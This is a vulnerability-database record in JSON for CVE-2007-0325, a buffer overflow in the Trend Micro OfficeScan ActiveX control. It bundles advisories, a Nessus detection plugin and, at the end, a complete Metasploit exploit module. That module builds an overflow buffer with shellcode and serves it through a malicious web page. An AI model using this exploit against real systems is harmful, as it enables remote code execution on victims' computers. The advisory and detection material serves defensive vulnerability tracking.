"references": [], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288\nVendor Specific News/Changelog Entry: http://www.trendmicro.com/ftp/documentation/readme/osce_70_win_en_securitypatch_1344_readme.txt\nSecurity Tracker: 1017664\n[Secunia Advisory ID:24193](https://secuniaresearch.flexerasoftware.com/advisories/24193/)\nFrSIRT Advisory: ADV-2007-0638\n[CVE-2007-0325](https://vulners.com/cve/CVE-2007-0325)\nCERT VU: 784369\nBugtraq ID: 22585\n", "edition": 1, "reporter": "OSVDB", "published": "2007-02-12T09:33:54", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Trend Micro OfficeScan OfficeScanSetupINI.dll SetupINICtrl ActiveX Multiple Overflows", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-0325"], "modified": "2007-02-12T09:33:54", "href": "https://vulners.com/osvdb/OSVDB:33040", "id": "OSVDB:33040", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:48:08", "references": ["http://www.nessus.org/u?14064dc2", "http://www.nessus.org/u?62e87258", "http://www.nessus.org/u?ad4ca3ae", "http://www.nessus.org/u?2b2f278b"], "pluginID": "24683", "description": "The remote host is running Trend Micro Antivirus, a commercial anti- virus software package for Windows.\n\nThe remote version of the installed antivirus is vulnerable to a remote buffer overflow attack.\n\nThe issue exists due a vulnerability in the ActiveX control installed by the OfficeScan server during a web install of the OfficeScan clients. The clients cache this ActiveX control, which can be exploited by a malicious website. The attacker can trigger this issue by enticing a user to click on a malicious link or sending the link in an email and urging the user to click on it. Successful exploitation of this issue might result in arbitrary code execution.", "edition": 7, "reporter": "Tenable", "published": "2007-02-21T00:00:00", "title": "Trend Micro OfficeScan OfficeScanSetupINI.dll Remote Buffer Overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0325"], "modified": "2018-08-03T00:00:00", "cpe": ["cpe:/a:trend_micro:officescan_corporate_edition"], "id": "TRENDMICRO_OFSCAN_BUFFER_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24683", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24683);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n script_cve_id(\"CVE-2007-0325\");\n script_bugtraq_id(22585);\n\n script_name(english:\"Trend Micro OfficeScan OfficeScanSetupINI.dll Remote Buffer Overflow\");\n script_summary(english:\"Checks if vulnerable version Trend Micro OfficeScan is installed\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Trend Micro Antivirus, a commercial anti-\nvirus software package for Windows.\n\nThe remote version of the installed antivirus is vulnerable to a\nremote buffer overflow attack.\n\nThe issue exists due a vulnerability in the ActiveX control installed\nby the OfficeScan server during a web install of the OfficeScan\nclients. The clients cache this ActiveX control, which can be\nexploited by a malicious website. The attacker can trigger this issue\nby enticing a user to click on a malicious link or sending the link in\nan email and urging the user to click on it. Successful exploitation\nof this issue might result in arbitrary code execution.\");\n # http://www.trendmicro.com/ftp/documentation/readme/osce_73_win_en_securitypatch_1241_readme.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62e87258\");\n # http://www.trendmicro.com/ftp/documentation/readme/osce_70_win_en_securitypatch_1344_readme.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14064dc2\" );\n # File Download\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2b2f278b\" );\n # File Download\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad4ca3ae\" );\n script_set_attribute(attribute:\"solution\", value:\"Apply the security patch released by the vendor.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:trend_micro:officescan_corporate_edition\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\",\"trendmicro_installed.nasl\");\n script_require_keys(\"Antivirus/TrendMicro/installed\",\"Antivirus/TrendMicro/trendmicro_program_version\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\nif (!get_kb_item(\"Antivirus/TrendMicro/installed\"))\n exit(0);\n\nname = kb_smb_name();\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(0);\n}\n\n# Connect to remote hkcr registry.\nhkcr = RegConnectRegistry(hkey:HKEY_CLASS_ROOT);\nif (isnull(hkcr))\n{\n NetUseDel();\n exit(0);\n}\n\n# Determine if the control is installed.\nclid = \"08D75BC1-D2B5-11D1-88FC-0080C859833B\";\nkey = \"CLSID\\{\" + clid + \"}\\InprocServer32\";\nkey_h = RegOpenKey(handle:hkcr, key:key, mode:MAXIMUM_ALLOWED);\npath = NULL;\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value)) path = value[1];\n\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hkcr);\n\nif(isnull(path) || \"OfficeScanSetup.dll\" >!< path )\n{\n NetUseDel();\n exit(0);\n}\n\n# Connect to remote hklm registry.\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(0);\n}\n\nexe = NULL;\npath = NULL;\n\n# Determine where it's installed.\n\nkey = \"SOFTWARE\\TrendMicro\\PC-cillinNTCorp\\CurrentVersion\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:\"Application Path\");\n if (!isnull(value))\n path = value[1];\n\n RegCloseKey(handle:key_h);\n}\n\n\nRegCloseKey(handle:hklm);\n\nif (isnull(path))\n{\n NetUseDel();\n exit(0);\n}\n\nNetUseDel(close:FALSE);\n\npath1 = path;\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\npath = ereg_replace(pattern:\"^[A-Za-z]:(.*)$\", replace:\"\\1\", string:path);\nexe = path + \"\\tmlisten.exe\";\n\n# Connect to the appropriate share.\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n exit(0);\n}\n\nfh = CreateFile(file:exe, desired_access:GENERIC_READ, file_attributes:FILE_ATTRIBUTE_NORMAL, share_mode:FILE_SHARE_READ, create_disposition:OPEN_EXISTING);\n\nv = NULL;\ntrouble = 0;\n\nif (!isnull(fh))\n{\n v = GetFileVersion(handle:fh);\n CloseFile(handle:fh);\n}\nNetUseDel();\n\nif (\n !isnull(v) &&\n (\n v[0] < 7 ||\n (\n (v[0] == 7 && v[1] == 3 && v[2] == 0 && v[3] < 1241) ||\n (v[0] == 7 && v[1] == 0 && v[2] == 0 && v[3] < 1344)\n )\n )\n)\n{\n info = string (\n\t\t'Version ', v[0], \".\", v[1], \".\", v[2], \".\", v[3], ' of tmlisten.exe is installed on the remote\\n',\n\t\t'host under the following path :\\n',\n\t\t'\\n',\n\t\t' ', path1\n\t\t);\n\n report = string(\n\t\t\"\\n\",\n\t\tinfo,\"\\n\"\n \t\t);\n\n security_hole(port:port, extra:report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "references": [], "description": "Added: 02/21/2007 \nCVE: [CVE-2007-0325](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325>) \nBID: [22585](<http://www.securityfocus.com/bid/22585>) \nOSVDB: [33040](<http://www.osvdb.org/33040>) \n\n\n### Background\n\n[Trend Micro OfficeScan](<http://www.trendmicro.com/en/products/desktop/osce/evaluate/overview.htm>) is a centralized virus and security scan management system. \n\n### Problem\n\nThe OfficeScan Web-Deployment SetupINICtrl ActiveX control, which is vulnerable to buffer overflows in multiple methods, is automatically installed on any client which uses the web-based administration console. Exploitation of these buffer overflows by a malicious web page leads to command execution. \n\n### Resolution\n\nUpgrade to OfficeScan 7.0 Build 1344, OfficeScan 7.3 Build 1241, or Client/Server/Messaging Security 3.0 Build 1197. For more information see [Trend Micro solution ID 1034288](<http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/784369> \n\n\n### Limitations\n\nExploit works on the ActiveX control which comes with Trend Micro OfficeScan Corporate Edition 7.3. A computer with the vulnerable ActiveX control must load the exploit page in order for the exploit to succeed. The vulnerable ActiveX control is installed if the computer has previously accessed the following URL where _OfficeScanServer_ is the IP address of the OfficeScan server: \n\n> http://OfficeScanServer:8080/ \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2007-02-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "saint", "title": "Trend Micro OfficeScan client ActiveX control buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0325"], "modified": "2007-02-21T00:00:00", "id": "SAINT:A63A5267BA9B131DA4796E297445F63D", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/trend_micro_officescan_activex", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:21", "references": [], "description": "Added: 02/21/2007 \nCVE: [CVE-2007-0325](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325>) \nBID: [22585](<http://www.securityfocus.com/bid/22585>) \nOSVDB: [33040](<http://www.osvdb.org/33040>) \n\n\n### Background\n\n[Trend Micro OfficeScan](<http://www.trendmicro.com/en/products/desktop/osce/evaluate/overview.htm>) is a centralized virus and security scan management system. \n\n### Problem\n\nThe OfficeScan Web-Deployment SetupINICtrl ActiveX control, which is vulnerable to buffer overflows in multiple methods, is automatically installed on any client which uses the web-based administration console. Exploitation of these buffer overflows by a malicious web page leads to command execution. \n\n### Resolution\n\nUpgrade to OfficeScan 7.0 Build 1344, OfficeScan 7.3 Build 1241, or Client/Server/Messaging Security 3.0 Build 1197. For more information see [Trend Micro solution ID 1034288](<http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/784369> \n\n\n### Limitations\n\nExploit works on the ActiveX control which comes with Trend Micro OfficeScan Corporate Edition 7.3. A computer with the vulnerable ActiveX control must load the exploit page in order for the exploit to succeed. The vulnerable ActiveX control is installed if the computer has previously accessed the following URL where _OfficeScanServer_ is the IP address of the OfficeScan server: \n\n> http://OfficeScanServer:8080/ \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2007-02-21T00:00:00", "title": "Trend Micro OfficeScan client ActiveX control buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0325"], "modified": "2007-02-21T00:00:00", "id": "SAINT:C96CB693A14BF8B4DB8F59FA09D7491E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/trend_micro_officescan_activex", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "references": [], "edition": 1, "description": "Added: 02/21/2007 \nCVE: [CVE-2007-0325](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325>) \nBID: [22585](<http://www.securityfocus.com/bid/22585>) \nOSVDB: [33040](<http://www.osvdb.org/33040>) \n\n\n### Background\n\n[Trend Micro OfficeScan](<http://www.trendmicro.com/en/products/desktop/osce/evaluate/overview.htm>) is a centralized virus and security scan management system. \n\n### Problem\n\nThe OfficeScan Web-Deployment SetupINICtrl ActiveX control, which is vulnerable to buffer overflows in multiple methods, is automatically installed on any client which uses the web-based administration console. Exploitation of these buffer overflows by a malicious web page leads to command execution. \n\n### Resolution\n\nUpgrade to OfficeScan 7.0 Build 1344, OfficeScan 7.3 Build 1241, or Client/Server/Messaging Security 3.0 Build 1197. For more information see [Trend Micro solution ID 1034288](<http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034288>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/784369> \n\n\n### Limitations\n\nExploit works on the ActiveX control which comes with Trend Micro OfficeScan Corporate Edition 7.3. A computer with the vulnerable ActiveX control must load the exploit page in order for the exploit to succeed. The vulnerable ActiveX control is installed if the computer has previously accessed the following URL where _OfficeScanServer_ is the IP address of the OfficeScan server: \n\n> http://OfficeScanServer:8080/ \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 \n \n\n", "reporter": "SAINT Corporation", "published": "2007-02-21T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Trend Micro OfficeScan client ActiveX control buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0325"], "modified": "2007-02-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/trend_micro_officescan_activex", "id": "SAINT:363AD88632C87CA33972EA62E7182E12", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "references": [], "description": "Buffer overflow in SetupINICtrl ActiveX.", "edition": 1, "reporter": "CVE", "published": "2007-02-21T00:00:00", "title": "TrendMicro OfficeScan ActiveX buffer overflow", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:23", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Trend Micro Client Security", "version": "3.0", "operator": "eq"}, {"name": "Trend Micro Server Security", "version": "3.0", "operator": "eq"}, {"name": "OfficeScan", "version": "7.3", "operator": "eq"}, {"name": "OfficeScan", "version": "7.0", "operator": "eq"}, {"name": "Trend Micro Messaging Security", "version": "3.0", "operator": "eq"}], "cvelist": ["CVE-2007-0325"], "modified": "2007-02-21T00:00:00", "id": "SECURITYVULNS:VULN:7278", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7278", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T00:05:14", "osvdbidlist": ["33040"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow. CVE-2007-0325. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0325"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16535", "href": "https://www.exploit-db.com/exploits/16535/", "sourceData": "##\r\n# $Id: trendmicro_officescan.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Trend Micro OfficeScan\r\n\t\t\t\tCorporate Edition 7.3. By sending an overly long string to the\r\n\t\t\t\t\"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0325' ],\r\n\t\t\t\t\t[ 'OSVDB', '33040' ],\r\n\t\t\t\t\t[ 'BID', '22585' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Randomize some things\r\n\t\tvname\t= rand_text_alpha(rand(100) + 1)\r\n\t\tstrname\t= rand_text_alpha(rand(100) + 1)\r\n\r\n\t\t# Set the exploit buffer\r\n\t\tsploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\r\n\r\n\t\t# Build out the message\r\n\t\tcontent = %Q|\r\n\t\t\t<html>\r\n\t\t\t<object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\r\n\t\t\t<script language='javascript'>\r\n\t\t\tvar #{vname} = document.getElementById('#{vname}');\r\n\t\t\tvar #{strname} = new String('#{sploit}');\r\n\t\t\t#{vname}.CgiOnUpdate = #{strname};\r\n\t\t\t</script>\r\n\t\t\t</html>\r\n\t\t\t|\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16535/"}]}